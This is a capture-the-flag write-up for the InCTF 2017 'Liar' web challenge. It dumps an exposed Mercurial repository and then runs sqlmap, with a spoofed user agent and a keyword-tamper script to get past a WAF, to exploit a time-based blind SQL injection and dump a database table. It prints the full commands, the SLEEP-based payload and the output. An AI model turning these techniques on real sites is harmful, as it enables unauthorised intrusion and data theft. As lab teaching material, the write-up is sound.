InCTF 2017 - Write-up

Informations

Version

By Version Comment
noraj 1.0 Creation

CTF

  • Name : InCTF 2017
  • Website : ctf.inctf.in
  • Type : Online
  • Format : Jeopardy
  • CTF Time : link

300 - Liar - Web

We don't have anything in our website.

Link

The is a VCS exposed by the web server. Git is not the only VCS, here we have a mercurial repository. I used DVCS-ripper to dump the repository:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
$ ~/CTF/tools/dvcs-ripper/rip-hg.pl -v -u http://liar.inctf.in/.hg/
[i] Downloading hg files from http://liar.inctf.in/.hg/
[i] Auto-detecting 404 as 200 with 3 requests
[i] Getting correct 404 responses
[d] found 00changelog.i
[d] found dirstate
[d] found requires
[d] found branch
[!] Not found for branchheads.cache: 404 Not Found
[d] found last-message.txt
[!] Not found for tags.cache: 404 Not Found
[d] found undo.branch
[d] found undo.desc
[d] found undo.dirstate
[d] found store/00changelog.i
[!] Not found for store/00changelog.d: 404 Not Found
[d] found store/00manifest.i
[!] Not found for store/00manifest.d: 404 Not Found
[d] found store/fncache
[d] found store/undo
[!] Not found for .hgignore: 404 Not Found
[i] Running hg status to check for missing items
[i] Got items with hg status: 3
[!] Not found for store/data/.hgignore.d: 404 Not Found
[!] Not found for store/data/.hgignore.i: 404 Not Found
[!] Not found for store/data/1ts_h4rd_t0_gu3ss/index.html.d: 404 Not Found
[!] Not found for store/data/1ts_h4rd_t0_gu3ss/index.html.i: 404 Not Found
[!] Not found for store/data/1ts_h4rd_t0_gu3ss/vulnerable.php.d: 404 Not Found
[!] Not found for store/data/1ts_h4rd_t0_gu3ss/vulnerable.php.i: 404 Not Found
[!] Not found for store/data/index.html.d: 404 Not Found
[d] found store/data/index.html.i
[i] Finished (1 of 4)

We can see there are other files on the web server (not available on the mercurial repository).

1
2
3
4
$ hg status
! .hgignore
! 1ts_h4rd_t0_gu3ss/index.html
! 1ts_h4rd_t0_gu3ss/vulnerable.php

1ts_h4rd_t0_gu3ss/index.html has a form that send to 1ts_h4rd_t0_gu3ss/vulnerable.php and there is a comment hidden in the sources

1
2
<!--Could You beat our security!!!--!>
<!--Can you find the phone number of my friend, I guess it is stored in some table, I think it is in phone column--!>

So there is an SQL injection. I tried manually to test if some stuff were filtered. I saw that all SQL kerwords were detected by a WAF but using versionned keywords worked.

Then I tried with SQLmap but the WAF detected an automated tool so I told SQLmap to use a custom user-agent and to use my cookie.

Then we have a classic time-based blind SQLi.

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
$ sqlmap -u http://liar.inctf.in/1ts_h4rd_t0_gu3ss/vulnerable.php --method=POST --data='name=john' --dump --user-agent='Mozilla/5.0 (X11; Linux x86_64; rv:56.0) Gecko/20100101 Firefox/56.0' --cookie='__cfduid=da3d6e025cbfedf0e2f3e6a695f45bdaf1513502488' --tamper=versionedkeywords --dbms=mysql -v 3 --level 2 --risk 3

[...]

Parameter: name (POST)
Type: AND/OR time-based blind
Title: MySQL >= 5.0.12 OR time-based blind
Payload: name=john') OR SLEEP(5) AND ('PuTF'='PuTF
Vector: OR [RANDNUM]=IF(([INFERENCE]),SLEEP([SLEEPTIME]),[RANDNUM])

[...]

web server operating system: Linux Ubuntu
web application technology: Nginx
back-end DBMS: MySQL >= 5.0.12

[...]

Database: CTF
Table: gu3ss1ng_must_n0t_h4pp3n
[5 entries]
+--------------------------------+----------------+---------+
| phone | email | user |
+--------------------------------+----------------+---------+
| 12345 | admin@bi0s.com | <blank> |
| inctf{H0w_@b0Ut_@n_r3@L_1nJ3c} | InCTF flag | <blank> |
| 100 | rahul@bi0s.com | <blank> |
| 900 | ram@google.com | <blank> |
| 123456 | ram@yahoo.com | <blank> |
+--------------------------------+----------------+---------+

[...]
Share